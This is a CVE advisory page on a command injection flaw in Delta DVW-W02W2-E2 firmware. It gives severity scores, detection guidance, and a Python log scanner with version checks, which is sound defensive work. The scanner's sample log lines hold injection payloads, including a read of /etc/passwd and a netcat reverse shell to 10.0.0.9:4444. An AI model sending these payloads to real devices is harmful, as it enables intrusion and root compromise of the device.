CVE-2022-42139
published 2022-12-14

CVE-2022-42139: Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL.

Priority: P2 · 66 · high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS: 18.16% (96.8th percentile)

Affected (1 range)

Vendor: deltaww
Product: dvw-w02w2-e2_firmware
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

  • Vulnerability is exploitable via authenticated HTTP POST parameters on the DVW-W02W2-E2 web server — monitor for anomalous POST requests containing OS command injection payloads (e.g., shell metacharacters) to the device's web interface
  • NVD describes exploitation via a crafted URL — also monitor GET requests with shell metacharacters or command-injection sequences in URL parameters targeting the DVW-W02W2-E2 web interface
  • A public Proof of Concept exists (authored by T. Weber of CyberDanube Security Research) — prioritize detection and patching given active PoC availability
  • Successful exploitation grants root-level OS access — look for unexpected outbound connections, new privileged processes, or serial port command activity originating from the DVW-W02W2-E2 device
  • NVD attributes the vulnerability to firmware version 1.5.0.10, while the CISA ICS advisory attributes it to version 2.42 — ensure detection and patching scope covers both version references for the DVW-W02W2-E2
  • The vulnerability requires only low privileges (authenticated, PR:L) to exploit — do not assume that requiring authentication is a sufficient mitigation; any low-privileged account can be leveraged
  • The patched firmware version is 2.5.2 — devices running version 2.42 (or 1.5.0.10 per NVD) and below should be considered vulnerable and flagged in asset inventories
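The two checks the bullets above call for, request-level detection of shell metacharacters in GET query strings and POST bodies, and version scoping that copes with the 1.5.0.10 / 2.42 / 2.5.2 discrepancy, written out as an added Python example. This is illustrative code, not from the advisories, the vendor, or the PoC author. The access-log format (combined log with a trailing `body="..."` field), the CGI paths and the parameter names `host` and `hostname` are assumptions for the example; the sources do not name the vulnerable parameter. The log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Shell metacharacters and command-separator characters that no legitimate
# parameter sent to an embedded device web UI should contain. Values are
# checked after URL decoding, so %3B / %0A style encoding is caught as well.
SHELL_META_RE = re.compile(r"[;|&`$\n\r]")

# Constructed sample access-log lines (combined log plus a body="..." field
# for POST requests). Paths and parameter names are assumptions, not the
# device's real ones.
SAMPLE_LOG = """\
10.0.0.5 - admin [14/Dec/2022:10:00:01 +0000] "GET /index.htm HTTP/1.1" 200 2048 body=""
10.0.0.5 - admin [14/Dec/2022:10:00:09 +0000] "GET /ping.cgi?host=10.0.0.1 HTTP/1.1" 200 312 body=""
10.0.0.9 - user1 [14/Dec/2022:10:01:14 +0000] "GET /ping.cgi?host=10.0.0.1%3Bcat%20/etc/passwd HTTP/1.1" 200 1900 body=""
10.0.0.9 - user1 [14/Dec/2022:10:01:30 +0000] "POST /config.cgi HTTP/1.1" 200 128 body="hostname=ap1&ntp=pool.ntp.org"
10.0.0.9 - user1 [14/Dec/2022:10:01:41 +0000] "POST /config.cgi HTTP/1.1" 200 128 body="hostname=ap1%0Aid&ntp=pool.ntp.org"
10.0.0.9 - user1 [14/Dec/2022:10:02:02 +0000] "POST /config.cgi HTTP/1.1" 200 128 body="hostname=`nc+10.0.0.9+4444+-e+/bin/sh`"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'body="(?P<body>[^"]*)"$'
)


def injected_params(query_string):
    """Return (name, decoded value) pairs whose decoded value contains
    shell metacharacters. parse_qsl does the percent/plus decoding."""
    return [
        (name, value)
        for name, value in parse_qsl(query_string, keep_blank_values=True)
        if SHELL_META_RE.search(value)
    ]


def scan_access_log(log_text):
    """Flag requests whose URL query (any method) or form body (POST) carries
    command-injection metacharacters. Returns a list of finding dicts."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        hits = injected_params(urlsplit(m["target"]).query)
        if m["method"] == "POST":
            hits += injected_params(m["body"])
        if hits:
            findings.append({
                "src": m["src"], "user": m["user"], "method": m["method"],
                "path": urlsplit(m["target"]).path, "params": hits,
            })
    return findings


FIXED_VERSION = "2.5.2"
# Version strings the sources name explicitly: NVD says 1.5.0.10, the CISA
# advisory says 2.42. "2.42" cannot be ordered numerically against "2.5.2"
# (42 > 5 would make it look patched), so it is matched literally instead.
ADVISORY_VERSIONS = {"1.5.0.10", "2.42"}


def _parse_version(v):
    return tuple(int(part) for part in v.strip().split("."))


def is_vulnerable_version(version):
    """True for the versions the sources name and for anything that parses
    numerically below the 2.5.2 fix. Unparseable strings are returned as
    vulnerable so they surface for manual review rather than disappear."""
    version = version.strip()
    if version in ADVISORY_VERSIONS:
        return True
    try:
        return _parse_version(version) < _parse_version(FIXED_VERSION)
    except ValueError:
        return True


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['src']} {f['user']} {f['method']} {f['path']} -> {f['params']}")
    for v in ("1.5.0.10", "2.42", "2.4.2", "2.5.2", "2.5.10"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "patched")
```

The metacharacter set is deliberately narrow for an embedded management UI, where free-text fields are rare; on a general web server the same regex would be noisy. Note that the version comparator only special-cases the two strings the sources actually name; any other 2.4x-style string on an inventory should be cross-checked against the CISA advisory rather than trusted to numeric ordering.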